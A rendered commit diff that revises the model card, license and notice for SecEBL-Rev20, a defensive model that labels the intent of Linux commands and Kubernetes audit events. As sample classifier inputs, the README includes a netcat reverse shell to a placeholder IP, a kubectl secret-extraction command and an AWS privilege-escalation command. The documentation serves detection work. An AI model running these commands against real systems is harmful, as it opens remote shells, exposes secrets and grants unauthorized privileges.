willchen0011 commited on
Commit
0edc8c9
·
1 Parent(s): 8ae30a3

Polish Hugging Face release docs

Browse files
LICENSE CHANGED
@@ -20,10 +20,10 @@ control, are controlled by, or are under common control with that entity.
20
  "Control" means direct or indirect power to direct management, ownership of
21
  fifty percent (50%) or more of outstanding shares, or beneficial ownership.
22
 
23
- "Model Artifacts" means SecEBL-Rev20 model weights, adapters, deltas,
24
- calibration files, model configuration files, tokenizer additions, evaluation
25
- artifacts distributed with the model, and other files that are expressly marked
26
- as licensed under this license.
27
 
28
  "Derivative Model Artifacts" means modified, fine-tuned, merged, converted,
29
  quantized, distilled, adapted, or otherwise transformed versions of the Model
 
20
  "Control" means direct or indirect power to direct management, ownership of
21
  fifty percent (50%) or more of outstanding shares, or beneficial ownership.
22
 
23
+ "Model Artifacts" means SecEBL-Rev20 model weights, adapters, deltas, model
24
+ configuration files, tokenizer additions, evaluation artifacts distributed with
25
+ the model, and other files that are expressly marked as licensed under this
26
+ license.
27
 
28
  "Derivative Model Artifacts" means modified, fine-tuned, merged, converted,
29
  quantized, distilled, adapted, or otherwise transformed versions of the Model
NOTICE CHANGED
@@ -1,8 +1,8 @@
1
  SecEBL-Rev20
2
  Copyright 2026 SecEBL contributors.
3
 
4
- This Hugging Face repository contains SecEBL-Rev20 model artifacts, calibration
5
- metadata, schema metadata, and an experimental L2 artifact. These model
6
  artifacts are licensed under the SecEBL Model License 1.0. See LICENSE.
7
 
8
  SecEBL-Rev20 is based on Alibaba-NLP/gte-modernbert-base, which is licensed
 
1
  SecEBL-Rev20
2
  Copyright 2026 SecEBL contributors.
3
 
4
+ This Hugging Face repository contains SecEBL-Rev20 model artifacts, schema
5
+ metadata, and an experimental L2 artifact. These model
6
  artifacts are licensed under the SecEBL Model License 1.0. See LICENSE.
7
 
8
  SecEBL-Rev20 is based on Alibaba-NLP/gte-modernbert-base, which is licensed
README.md CHANGED
@@ -20,95 +20,363 @@ tags:
20
  **SecEBL** stands for **Security Event Behavior Labeler**.
21
 
22
  SecEBL-Rev20 is an intent-recognition model for security telemetry. It maps a
23
- Linux command line or normalized Kubernetes AuditLog event into explicit
24
- behavior-intent tags, so downstream detection can reason about what an actor is
25
- trying to do instead of only matching fixed strings, blacklists, allowlists, or
26
- opaque risk scores.
27
 
28
  Project repository: [github.com/EBWi11/SecEBL](https://github.com/EBWi11/SecEBL)
29
 
30
- ## Project Context
31
 
32
- Traditional intrusion-detection systems still rely heavily on blacklists,
33
- allowlists, signatures, hand-written rules, and low-explainability ML. Those
34
- tools are useful, but they struggle with living-off-the-land behavior, fast
35
- syntax drift, and multi-platform telemetry where the same behavior appears in
36
- different log shapes.
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
37
 
38
- SecEBL adds an intent-detection layer. The goal is not to discard rules or
39
- policy engines, but to give them a better intermediate representation:
40
- portable, explainable behavior tags such as credential access, remote execution,
41
- persistence, data staging, cloud privilege changes, or service-health checks.
42
 
43
- The model is designed as the L1 layer of SecEBL:
44
 
45
  ```text
46
- raw security event
47
- -> L1 behavior-intent recognition
48
- -> L2 session reasoning or another downstream detector
49
- -> alert / review / policy
50
  ```
51
 
52
- L1 does not decide that a single event is an intrusion. It produces ranked,
53
- explainable behavior evidence such as `read_credential_material`,
54
- `execute_remote_command`, `create_scheduled_task`, `grant_cluster_privilege`,
55
- or `query_service_health`.
56
 
57
- ## What Is In This Model Repository
58
 
59
- This Hugging Face repository is the model artifact bundle. It intentionally does
60
- not include training corpora, full final benchmarks, private pressure-stream
61
- rows, raw run logs, or internal review files because parts of those materials
62
- contain real telemetry or real operational context.
63
 
64
  | Path | Purpose |
65
  | --- | --- |
66
  | `model.safetensors`, tokenizer/config files | SentenceTransformers-compatible SecEBL-Rev20 embedding model. |
67
- | `semantic_texts.jsonl` | Rev20 tag semantic texts used for L1 retrieval. |
68
- | `score_calibration.rev20.json` | Release calibration thresholds for tag selection. |
69
  | `schema/tags_schema_rev20.json` | Canonical Rev20 behavior vocabulary, 361 tags across 12 groups. |
70
  | `l2_artifacts/logreg.joblib` | Experimental L2 logistic-regression session scorer. |
71
- | `l2_artifacts/tag_risk_policy.rev20.json` | Matching L2 tag-selection and risk-feature policy. |
72
- | `l2_artifacts/train_summary.json` | Public aggregate L2 training/evaluation summary. |
73
  | `LICENSE`, `NOTICE` | Model license and attribution notices. |
74
 
75
- The companion GitHub release repository
76
- ([EBWi11/SecEBL](https://github.com/EBWi11/SecEBL)) contains the runnable Python
77
- helpers, public example data, and one-command smoke-test script. Download this
78
- model repository and point the GitHub helper scripts at it as `MODEL_DIR`.
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
79
 
80
- ## Rev20 Vocabulary
 
 
 
 
 
 
 
81
 
82
- Rev20 is a flat behavior-tag schema:
 
 
83
 
84
  | Item | Count |
85
  | --- | ---: |
86
  | Top-level behavior groups | 12 |
87
  | Behavior tags | 361 |
88
 
89
- The vocabulary was built to represent visible behavior intent rather than final
90
- maliciousness. This makes the tags useful as an intermediate representation for
91
- rules, analyst review, session scoring, and later sequence models.
92
-
93
- ## L1 Evaluation Snapshot
94
 
95
- Current documented L1 baseline:
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
96
 
97
- ```text
98
- featurize-rev20-20260620-072423-ep128-bs112-latestdata
99
- ```
100
 
101
  | Dataset | Dynamic exact | Top5 any-hit | Top5 all-covered | Micro recall@5 |
102
  | --- | ---: | ---: | ---: | ---: |
103
- | Linux final gold | 87.32% | 98.49% | 95.44% | 96.44% |
104
- | K8s final gold | 99.31% | 100.00% | 100.00% | 100.00% |
105
  | Combined | 87.47% | 98.50% | 95.50% | 96.47% |
106
 
107
- These metrics were measured on withheld internal final-gold evaluation sets, not
108
- on the public example subset. The Linux final gold covers the full 361-tag
109
- Rev20 vocabulary and includes dense multi-tag command rows. The K8s result
110
- should be read as a small-domain sanity result because the current K8s corpus is
111
- much smaller than the Linux corpus.
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
112
 
113
  ## L2 Artifact
114
 
@@ -116,26 +384,39 @@ This repository includes an experimental fitted L2 session scorer so the
116
  companion GitHub `scripts/run_examples.sh` can run the public Linux example
117
  sessions end to end when this model directory is used as `MODEL_DIR`.
118
 
119
- L2 consumes cached L1 `top_labels` and selected behavior tags. It does not use
120
- raw command text, user names, host names, or session ids as runtime scoring
121
- features. The included L2 artifact is a research/reproducibility component, not
122
- a general production IDS claim.
 
 
 
 
 
 
 
 
 
 
 
 
123
 
124
  Internal L2 summary:
125
 
126
  | Check | Result |
127
  | --- | ---: |
128
- | Withheld Linux final sessions | 663 sessions, 100.00% accuracy in the fitted check |
129
  | 7M pressure-stream fit-check | 6,286,568 rows, 102,117 sessions, 61 alert sessions |
130
- | OOF validation | 99.39% accuracy, 96.44% attack precision, 95.31% attack recall |
131
 
132
  The 7M pressure-stream result was measured on real background telemetry plus
133
  embedded synthetic attack sessions. The underlying rows and real session
134
- identifiers are not redistributed.
 
135
 
136
- ## Basic Loading
137
 
138
- Load the embedding model directly with SentenceTransformers:
139
 
140
  ```python
141
  from sentence_transformers import SentenceTransformer
@@ -143,25 +424,12 @@ from sentence_transformers import SentenceTransformer
143
  model = SentenceTransformer("willchen0011/SecEBL")
144
  ```
145
 
146
- SecEBL is a retrieval-style labeler: encode the event, encode the Rev20 semantic
147
- tag texts from `semantic_texts.jsonl`, rank by cosine similarity, then apply the
148
- matching calibration thresholds. For normal use, prefer the companion GitHub
149
- helpers because they keep prompt profile, calibration, top-k saving, and L2
150
- inputs aligned.
151
-
152
- Example with the companion repository checked out next to this model snapshot:
153
-
154
- ```bash
155
- git clone https://github.com/EBWi11/SecEBL.git
156
- cd SecEBL
157
- git lfs install
158
- git clone https://huggingface.co/willchen0011/SecEBL model_artifacts
159
- scripts/run_examples.sh
160
- ```
161
-
162
- That script runs Linux and K8s public example L1 evaluation. Because this model
163
- repository includes `l2_artifacts/logreg.joblib`, it also runs the Linux public
164
- example L2 session scorer by default.
165
 
166
  ## Intended Use
167
 
@@ -169,7 +437,7 @@ example L2 session scorer by default.
169
  - Internal security detection, investigation, and triage for systems an
170
  organization owns, operates, administers, or is explicitly authorized to
171
  defend.
172
- - Building session-level risk scoring over SecEBL behavior-tag streams.
173
 
174
  ## Out Of Scope
175
 
@@ -182,8 +450,8 @@ example L2 session scorer by default.
182
  ## License
183
 
184
  The model artifacts are released under **SecEBL Model License 1.0**. This is an
185
- open-weight restricted-use model license, not Apache-2.0 and not an OSI-approved
186
- open source license.
187
 
188
  The base model is `Alibaba-NLP/gte-modernbert-base`, which is Apache-2.0.
189
  Source code, schemas, public examples, and helper scripts in the companion
 
20
  **SecEBL** stands for **Security Event Behavior Labeler**.
21
 
22
  SecEBL-Rev20 is an intent-recognition model for security telemetry. It maps a
23
+ Linux command line or normalized Kubernetes AuditLog event into ranked
24
+ behavior-intent labels, so downstream detection can reason about what an actor
25
+ is trying to do instead of only matching fixed strings, allowlists, blacklists,
26
+ or opaque risk scores.
27
 
28
  Project repository: [github.com/EBWi11/SecEBL](https://github.com/EBWi11/SecEBL)
29
 
30
+ ## At A Glance
31
 
32
+ | Area | Current release summary |
33
+ | --- | --- |
34
+ | Stable public API | L1 behavior-intent labeling with ranked `top_labels`. |
35
+ | Behavior vocabulary | 361 Rev20 behavior-intent tags across 12 security behavior groups. |
36
+ | Training scale | 86,285 internal corpus rows, 82,895 usable training observations, and 118,858 effective command/tag training pairs. |
37
+ | Corpus breadth | Linux commands plus normalized Kubernetes AuditLog events, covering roughly 2,700 distinct Linux first-token/tool forms and common security/operations tooling. |
38
+ | Benchmark scale | 12,594-row internal Linux command benchmark covering all 361 behavior tags, 663 internal Linux sessions, and a 6,286,568-row / 102,117-session pressure stream. |
39
+ | L1 accuracy | 98.49% top5 any-hit and 96.44% micro recall@5 on the internal Linux command benchmark; 100.00% top5 coverage on the K8s evaluation set. |
40
+ | Inference performance | RTX 5090 spot-check: mean 5,308.72 unique cmdlines/s with FP16 + SDPA; exact raw-event cache lookup measured separately at about 1.8M rows/s. |
41
+ | Training setup | `Alibaba-NLP/gte-modernbert-base`, MNRL with hard-negative-aware batches, RTX 5090 32GB, 128 full-pass epochs, batch size 112, about 16.2 hours. |
42
+
43
+ The public examples are intentionally smaller than the internal benchmark data.
44
+ They exist so users can run the model locally and inspect outputs without access
45
+ to private telemetry. The full training corpora, internal benchmarks, private
46
+ pressure-stream rows, and private run logs are not redistributed because parts
47
+ of them contain real telemetry or real operational context.
48
+
49
+ ## First-Time User Path
50
+
51
+ Use the companion GitHub repository for the runnable code and this Hugging Face
52
+ repository for model artifacts:
53
+
54
+ ```bash
55
+ git clone https://github.com/EBWi11/SecEBL.git
56
+ cd SecEBL
57
+
58
+ git lfs install
59
+ git clone https://huggingface.co/willchen0011/SecEBL model_artifacts
60
 
61
+ pip install -e .
62
+ scripts/run_examples.sh
63
+ ```
 
64
 
65
+ After the script finishes, inspect:
66
 
67
  ```text
68
+ runs/examples/linux_l1/predictions.jsonl
69
+ runs/examples/k8s_l1/predictions.jsonl
70
+ runs/examples/l2/example_linux_session_results.json
 
71
  ```
72
 
73
+ L1 is the stable behavior-labeling API. It outputs ranked behavior evidence,
74
+ not an intrusion verdict. L2 is optional and experimental; it runs only when an
75
+ L2 artifact such as `model_artifacts/l2_artifacts/logreg.joblib` is available.
 
76
 
77
+ ## What This Repository Contains
78
 
79
+ This Hugging Face repository is the model artifact bundle.
 
 
 
80
 
81
  | Path | Purpose |
82
  | --- | --- |
83
  | `model.safetensors`, tokenizer/config files | SentenceTransformers-compatible SecEBL-Rev20 embedding model. |
84
+ | `semantic_texts.jsonl` | Rev20 semantic label texts used by the L1 retrieval path. |
 
85
  | `schema/tags_schema_rev20.json` | Canonical Rev20 behavior vocabulary, 361 tags across 12 groups. |
86
  | `l2_artifacts/logreg.joblib` | Experimental L2 logistic-regression session scorer. |
87
+ | `l2_artifacts/tag_risk_policy.rev20.json` | Matching L2 feature policy. Its tag-selection settings are internal to L2 feature extraction. |
88
+ | `l2_artifacts/train_summary.json` | Public aggregate L2 training/evaluation summary with no raw rows or real session identifiers. |
89
  | `LICENSE`, `NOTICE` | Model license and attribution notices. |
90
 
91
+ This repository does not include the runnable helper scripts. Use
92
+ [EBWi11/SecEBL](https://github.com/EBWi11/SecEBL) for the Python package, public
93
+ examples, and one-command test script.
94
+
95
+ ## Output Shape
96
+
97
+ L1 predictions expose ranked `top_labels`:
98
+
99
+ ```json
100
+ {
101
+ "observation_id": "event:0",
102
+ "command": "nc -e /bin/sh 203.0.113.10 4444",
103
+ "top_labels": [
104
+ {
105
+ "label_id": "spawn_reverse_shell",
106
+ "score": 0.811,
107
+ "axis": "execution_and_process"
108
+ },
109
+ {
110
+ "label_id": "connect_external_service",
111
+ "score": 0.488,
112
+ "axis": "network"
113
+ }
114
+ ]
115
+ }
116
+ ```
117
+
118
+ L1 does not emit `behavior_tags` and does not apply a user-facing tag-selection
119
+ threshold. `behavior_tags[]` is the field used by training and evaluation label
120
+ files. Runtime prediction output is ranked `top_labels`.
121
+
122
+ ## Why Intent Labels Matter
123
+
124
+ Traditional IDS pipelines often depend on signatures, rules, allowlists,
125
+ blacklists, and low-explainability tabular ML. Those tools still matter, but
126
+ they can struggle when legitimate tools are used in suspicious ways, when tool
127
+ syntax drifts quickly, or when the same behavior appears in different telemetry
128
+ formats.
129
+
130
+ SecEBL adds an intermediate representation:
131
+
132
+ ```text
133
+ raw security event
134
+ -> L1 behavior-intent recognition
135
+ -> L2 session reasoning or another downstream detector
136
+ -> alert / review / policy
137
+ ```
138
+
139
+ L1 intentionally does not decide that a single event is an intrusion. It
140
+ produces explainable behavior evidence such as `read_credential_material`,
141
+ `execute_remote_command`, `create_scheduled_task`, `grant_cluster_privilege`,
142
+ or `query_service_health`.
143
+
144
+ This is useful for:
145
 
146
+ - LOLT / living-off-the-land behavior where the tool is legitimate but the
147
+ behavior may be suspicious in context.
148
+ - Rule-writing lag, where new tool syntax appears faster than signatures can be
149
+ maintained.
150
+ - Multi-platform telemetry, where Linux commands, Kubernetes audit events, and
151
+ future telemetry can share a behavior vocabulary.
152
+ - Explainable detection, where an alert should be tied to explicit behavior
153
+ labels rather than only an opaque score.
154
 
155
+ ## Data And Vocabulary
156
+
157
+ Rev20 is a flat behavior-tag schema.
158
 
159
  | Item | Count |
160
  | --- | ---: |
161
  | Top-level behavior groups | 12 |
162
  | Behavior tags | 361 |
163
 
164
+ Schema groups:
 
 
 
 
165
 
166
+ | Group | Tags |
167
+ | --- | ---: |
168
+ | `observation_and_discovery` | 51 |
169
+ | `configuration_and_log_modification` | 12 |
170
+ | `filesystem_and_data` | 33 |
171
+ | `execution_and_process` | 28 |
172
+ | `network` | 51 |
173
+ | `identity_auth_and_secrets` | 31 |
174
+ | `persistence_services_and_storage` | 27 |
175
+ | `kernel_memory_and_tracing` | 14 |
176
+ | `package_build_and_source` | 19 |
177
+ | `database_and_infrastructure_services` | 33 |
178
+ | `containers_and_cloud_native` | 34 |
179
+ | `cloud_control_plane` | 28 |
180
+
181
+ The release baseline was trained from internal Rev20 corpora:
182
+
183
+ | Corpus | Rows | Unique behavior tags | Notes |
184
+ | --- | ---: | ---: | --- |
185
+ | Linux command corpus | 85,277 | 361 | Mixed generated, reviewed, and manually expanded command examples. |
186
+ | Kubernetes AuditLog corpus | 1,008 | 40 | Manually authored normalized K8s audit events. |
187
+
188
+ The Linux corpus covers roughly 2,700 distinct first-token/tool forms by a
189
+ conservative executable-name estimate. Common families include shell utilities,
190
+ network tools, package/build tools, cloud CLIs, IaC tools, container tooling,
191
+ databases, secret stores, and Kubernetes tooling. Frequent examples include
192
+ `curl`, `kubectl`, `aws`, `grep`, `cat`, `systemctl`, `find`, `ssh`, `docker`,
193
+ `git`, `redis-cli`, `journalctl`, `psql`, `gcloud`, `mysql`, `az`, `nmap`,
194
+ `vault`, and `terraform`.
195
+
196
+ Top Linux corpus tags:
197
+
198
+ | Tag | Count |
199
+ | --- | ---: |
200
+ | `stage_temporary_path` | 5,179 |
201
+ | `read_credential_material` | 4,512 |
202
+ | `read_infrastructure_config` | 3,427 |
203
+ | `upload_external_content` | 1,886 |
204
+ | `stage_hidden_path` | 1,580 |
205
+ | `search_credentials` | 1,488 |
206
+ | `modify_service_state` | 1,459 |
207
+ | `upload_sensitive_content` | 1,424 |
208
+ | `read_business_data` | 1,378 |
209
+ | `execute_remote_command` | 1,374 |
210
+
211
+ Top K8s corpus tags:
212
+
213
+ | Tag | Count |
214
+ | --- | ---: |
215
+ | `modify_workload` | 221 |
216
+ | `enumerate_cluster_resources` | 131 |
217
+ | `modify_cluster_auth_policy` | 53 |
218
+ | `modify_route` | 49 |
219
+ | `execute_in_workload` | 47 |
220
+ | `inspect_workload` | 45 |
221
+ | `grant_cluster_privilege` | 39 |
222
+ | `modify_firewall_policy` | 38 |
223
+ | `modify_verification_material` | 37 |
224
+ | `inspect_auth_policy` | 33 |
225
+
226
+ ## Training Details
227
+
228
+ The raw training corpora are not redistributed, but the following details are
229
+ documented so readers can understand the model scale and method.
230
+
231
+ | Item | Value |
232
+ | --- | --- |
233
+ | Base model | `Alibaba-NLP/gte-modernbert-base` |
234
+ | Training objective | `MultipleNegativesRankingLoss` with hard-negative-aware batches |
235
+ | Training hardware | NVIDIA GeForce RTX 5090, 32GB VRAM, `cuda:0` |
236
+ | Epochs | 128 full-pass epochs |
237
+ | Batch size | 112 |
238
+ | Precision | `fp32` |
239
+ | Steps | 1,062 steps per epoch; 135,936 total optimizer steps |
240
+ | Runtime | 58,291 seconds, about 16.2 hours |
241
+ | Sequence length | 160 tokens |
242
+ | Optimizer schedule | learning rate `2e-5`, warmup ratio `0.06`, 8,156 warmup steps, weight decay `0.01` |
243
+
244
+ Training data scale:
245
+
246
+ | Training artifact | Count | Notes |
247
+ | --- | ---: | --- |
248
+ | Combined corpus rows | 86,285 | 85,277 Linux command rows plus 1,008 K8s AuditLog rows. |
249
+ | Non-empty training observations | 82,895 | Rows with usable behavior labels after skipping 3,390 abstain rows. |
250
+ | Base command-tag pairs | 117,092 | Positive command/tag pairs before boundary upsampling. |
251
+ | Effective positive pairs | 118,858 | Final pair count after targeted boundary upsampling. |
252
+ | Behavior labels | 361 | Full Rev20 behavior vocabulary used on the label side. |
253
+
254
+ The Linux corpus is intentionally mixed rather than a single synthetic source.
255
+ The largest source slices are roughly 36.9k generated rows, 28.5k manually
256
+ reviewed rows, 4.0k benchmark-prune/migration rows, 3.6k common-difference gap
257
+ rows, 2.7k reviewed generated rows, 2.6k baseline manual rows, and 2.3k attack
258
+ batch rows, plus smaller targeted boundary, miss-review, public-attack, and
259
+ high-miss batches.
260
+
261
+ Token lengths are short enough for a compact encoder. Across the final pair set,
262
+ command-side text is p50 32 tokens, p90 55, p95 68, and p99 113; fewer than
263
+ 0.3% of examples exceed the 160-token training limit. Label-side semantic texts
264
+ are p50 40 tokens and p95 62.
265
+
266
+ Hard negatives were designed in two layers:
267
+
268
+ - Schema-level negatives: the dataset builder used `schema_hard`, with a
269
+ 16-item hard-negative pool and up to 8 negatives per positive before MNRL
270
+ batching. These negatives come from semantically nearby Rev20 tags, so the
271
+ model is forced to separate labels such as read-vs-search, inspect-vs-modify,
272
+ local-vs-remote execution, and similar tool-boundary cases.
273
+ - Batch-level negatives: the training loader used hard-negative-aware MNRL
274
+ batches. The final run used config
275
+ `rev20_conservative_20260620_ep96_miss_v11`, covering 74 difficult labels and
276
+ placing 2 hard-negative labels near each anchor where possible.
277
+ - Boundary upsampling: 1,766 boundary-sensitive pairs were duplicated once,
278
+ producing 1,766 extra training exposures. These rows target recurring failure
279
+ modes such as grep/read ambiguity, wrapper commands, tool-specific boundaries,
280
+ no-hit review cases, and post-evaluation miss-review batches.
281
+
282
+ ## Evaluation Snapshot
283
+
284
+ The internal benchmark data is not public. The aggregate size, distribution,
285
+ and metrics are public so users can understand what the headline numbers mean.
286
+
287
+ Evaluation scale:
288
+
289
+ | Dataset | Rows | Rows with labels | Behavior-tag instances | Unique behavior tags |
290
+ | --- | ---: | ---: | ---: | ---: |
291
+ | Linux internal benchmark | 12,594 | 11,889 | 17,287 | 361 / 361 |
292
+ | K8s evaluation set | 144 | 144 | 163 | 27 / 361 |
293
+ | Combined | 12,738 | 12,033 | 17,450 | 361 / 361 |
294
 
295
+ Retrieval quality:
 
 
296
 
297
  | Dataset | Dynamic exact | Top5 any-hit | Top5 all-covered | Micro recall@5 |
298
  | --- | ---: | ---: | ---: | ---: |
299
+ | Linux internal benchmark | 87.32% | 98.49% | 95.44% | 96.44% |
300
+ | K8s evaluation set | 99.31% | 100.00% | 100.00% | 100.00% |
301
  | Combined | 87.47% | 98.50% | 95.50% | 96.47% |
302
 
303
+ The Linux benchmark covers the complete 361-tag Rev20 vocabulary and includes
304
+ complex multi-tag command rows. The K8s result should be read as a small-domain
305
+ sanity result rather than broad Kubernetes coverage because the current K8s
306
+ corpus is much smaller than the Linux corpus.
307
+
308
+ Internal Linux benchmark tag cardinality:
309
+
310
+ | Tags per row | Rows |
311
+ | --- | ---: |
312
+ | 0 | 705 |
313
+ | 1 | 8,829 |
314
+ | 2 | 1,567 |
315
+ | 3 | 901 |
316
+ | 4 | 402 |
317
+ | 5 | 139 |
318
+ | 6+ | 51 |
319
+
320
+ Top internal Linux benchmark tags:
321
+
322
+ | Tag | Count |
323
+ | --- | ---: |
324
+ | `stage_temporary_path` | 987 |
325
+ | `inspect_network_state` | 801 |
326
+ | `stage_hidden_path` | 655 |
327
+ | `inspect_current_identity` | 578 |
328
+ | `read_credential_material` | 551 |
329
+ | `inspect_system_state` | 481 |
330
+ | `inspect_infrastructure_service` | 390 |
331
+ | `query_dns_records` | 372 |
332
+ | `enumerate_filesystem` | 365 |
333
+ | `search_credentials` | 315 |
334
+
335
+ ## Example Outputs
336
+
337
+ These examples show the user-facing L1 output style. Scores are cosine/retrieval
338
+ scores after the release prompt profile. The public helper scripts save top
339
+ labels in `predictions.jsonl`.
340
+
341
+ | Event | Top 3 L1 tags | Note |
342
+ | --- | --- | --- |
343
+ | `nc -e /bin/sh 203.0.113.10 4444` | <code>spawn_reverse_shell</code> 0.811<br><code>connect_external_service</code> 0.488<br><code>spawn_bind_shell</code> 0.451 | `-e` is recognized as reverse-shell execution. |
344
+ | `nc -v 203.0.113.10 443` | <code>connect_external_service</code> 0.732<br><code>spawn_reverse_shell</code> 0.503<br><code>create_reverse_tunnel</code> 0.412 | Connection intent ranks above shell-spawn intent. |
345
+ | `cat /root/install.log` | <code>read_business_log</code> 0.641<br><code>read_system_log</code> 0.431<br><code>read_workload_logs</code> 0.385 | Log-read semantics dominate. |
346
+ | `cat /root/install.conf` | <code>read_infrastructure_config</code> 0.620<br><code>read_system_config</code> 0.612<br><code>read_kernel_parameter</code> 0.336 | Config-read semantics dominate. |
347
+ | `kubectl -n prod get secret payment-api-token -o jsonpath={.data.token} \| base64 -d` | <code>read_cluster_secret</code> 0.730<br><code>decode_data</code> 0.716<br><code>read_credential_material</code> 0.363 | K8s secret extraction and decoding. |
348
+ | `aws iam attach-user-policy --user-name temp --policy-arn arn:aws:iam::aws:policy/AdministratorAccess` | <code>grant_cloud_privilege</code> 0.838<br><code>modify_cloud_identity_policy</code> 0.535<br><code>modify_cloud_identity</code> 0.459 | Cloud privilege escalation semantics. |
349
+ | `curl -fsS http://127.0.0.1:8080/healthz` | <code>query_service_health</code> 0.840<br><code>inspect_local_kubernetes_cluster</code> 0.459<br><code>inspect_container_runtime</code> 0.383 | Local service health check. |
350
+
351
+ ## Runtime Performance
352
+
353
+ SecEBL-Rev20 is a SentenceTransformers-style embedding retriever over 361 Rev20
354
+ tag definitions. The serving path embeds the event, embeds or loads tag
355
+ definition embeddings, then ranks tags by similarity.
356
+
357
+ Current single-card CUDA recommendation:
358
+
359
+ | Setting | Value |
360
+ | --- | --- |
361
+ | Precision | FP16 |
362
+ | Attention | SDPA |
363
+ | `max_seq_length` | 160 |
364
+ | Batch size | 224 default; 384 was slightly faster in one RTX 5090 sweep but not enough to replace the stable default |
365
+ | Sorting | `sort_by=char` |
366
+ | Padding | dynamic, no forced pad alignment |
367
+ | Output path | GPU tensor output plus GPU top-k |
368
+
369
+ Measured on an NVIDIA GeForce RTX 5090 32GB spot-check:
370
+
371
+ | Mode | Throughput |
372
+ | --- | ---: |
373
+ | Recommended no-cache unique inference, `bs224` | mean 5,308.72 unique cmdlines/s |
374
+ | Recommended no-cache latency, `bs224` | about 0.1884 ms per unique cmdline |
375
+ | `bs224` repeat range | 5,025.47 - 5,433.78 unique cmdlines/s |
376
+ | Best quick-sweep point, `bs384` | 5,378.45 unique cmdlines/s |
377
+
378
+ Exact raw-event cache lookup was measured separately at mean 1,817,462.76
379
+ rows/s. Cache hits reuse saved L1 top-k results and do not run model inference.
380
 
381
  ## L2 Artifact
382
 
 
384
  companion GitHub `scripts/run_examples.sh` can run the public Linux example
385
  sessions end to end when this model directory is used as `MODEL_DIR`.
386
 
387
+ In this release, a **session** is a sequence of events grouped by `session_id`.
388
+ L1 labels each event independently. L2 scores the whole session by aggregating
389
+ cached L1 ranked tags, retrieval scores, tag diversity, behavior transitions,
390
+ and routine-operation context. The L2 output is a session-level verdict such as
391
+ `intrusion` or `normal_operation`, not a replacement for per-command behavior
392
+ tags.
393
+
394
+ For compatibility with the released L2 artifact, L2 derives its session
395
+ features from cached L1 `top_labels` using an internal selected-tag feature
396
+ path. In plain terms, L2 filters the cached ranked labels inside its own feature
397
+ builder before session scoring. This does not change L1 prediction output:
398
+ users still receive ranked `top_labels`, not a selected `behavior_tags` field.
399
+
400
+ Runtime L2 does not use raw command text, user names, host names, or session ids
401
+ as scoring features. Session ids may appear in private data-prep workflows for
402
+ label assignment, but they are not runtime allow/deny lists.
403
 
404
  Internal L2 summary:
405
 
406
  | Check | Result |
407
  | --- | ---: |
408
+ | Withheld Linux session benchmark | 663 sessions, 365 TP, 298 TN, 0 FP, 0 FN |
409
  | 7M pressure-stream fit-check | 6,286,568 rows, 102,117 sessions, 61 alert sessions |
410
+ | OOF validation | 5,747 sessions, 99.39% accuracy, 96.44% attack precision, 95.31% attack recall |
411
 
412
  The 7M pressure-stream result was measured on real background telemetry plus
413
  embedded synthetic attack sessions. The underlying rows and real session
414
+ identifiers are not redistributed. The included L2 artifact is a
415
+ research/reproducibility component, not a general production IDS claim.
416
 
417
+ ## Direct SentenceTransformers Loading
418
 
419
+ You can load the embedding model directly:
420
 
421
  ```python
422
  from sentence_transformers import SentenceTransformer
 
424
  model = SentenceTransformer("willchen0011/SecEBL")
425
  ```
426
 
427
+ Direct loading gives you the encoder only. SecEBL is a retrieval-style labeler:
428
+ encode the event, encode or load the Rev20 semantic label texts from
429
+ `semantic_texts.jsonl`, rank labels by cosine similarity, and save the top-k
430
+ labels. For normal use, prefer the companion GitHub helpers because they keep
431
+ the prompt profile, semantic text loading, top-k output format, and optional L2
432
+ feature path aligned with this release.
 
 
 
 
 
 
 
 
 
 
 
 
 
433
 
434
  ## Intended Use
435
 
 
437
  - Internal security detection, investigation, and triage for systems an
438
  organization owns, operates, administers, or is explicitly authorized to
439
  defend.
440
+ - Building session-level risk scoring over SecEBL behavior-label streams.
441
 
442
  ## Out Of Scope
443
 
 
450
  ## License
451
 
452
  The model artifacts are released under **SecEBL Model License 1.0**. This is an
453
+ open-weight restricted-use model license, not Apache-2.0 and not an
454
+ OSI-approved open source license.
455
 
456
  The base model is `Alibaba-NLP/gte-modernbert-base`, which is Apache-2.0.
457
  Source code, schemas, public examples, and helper scripts in the companion
l2_artifacts/README.md CHANGED
@@ -5,45 +5,47 @@ It is included so the companion GitHub `scripts/run_examples.sh` can run public
5
  Linux example-session scoring by default when this Hugging Face model snapshot
6
  is used as `MODEL_DIR`.
7
 
8
- Run tags:
9
-
10
- ```text
11
- L1: featurize-rev20-20260620-072423-ep128-bs112-latestdata
12
- L2: featurize-rev20-20260620-072423-ep128-bs112-latestdata-l2hn27-lenctx-semcal-20260621
13
- ```
14
-
15
  ## Files
16
 
17
  | Path | Purpose |
18
  | --- | --- |
19
  | `logreg.joblib` | Fitted logistic-regression L2 session-risk model. |
20
- | `tag_risk_policy.rev20.json` | Matching tag-selection and L2 risk-feature policy. |
21
  | `train_summary.json` | Public aggregate training/evaluation summary with no raw rows or real session identifiers. |
22
 
23
  The release does not include the L2 training JSONL, raw pressure-stream archive,
24
- full final sessions, per-session pressure results, alert JSONL, source-code
25
  copies, or private run logs. Use the companion GitHub repository for source
26
  code and public example data.
27
 
28
  ## Scope
29
 
30
- L2 consumes cached L1 outputs and aggregates semantic session features such as
31
- tag ratios, marker diversity, retrieval-score summaries, professional/routine
32
- operation ratios, and compact attack-chain indicators.
 
33
 
34
  Runtime L2 does not use raw command text, user names, host names, or session ids
35
  as scoring features. Session ids may appear in private data-prep workflows for
36
  label assignment, but they are not runtime allow/deny lists.
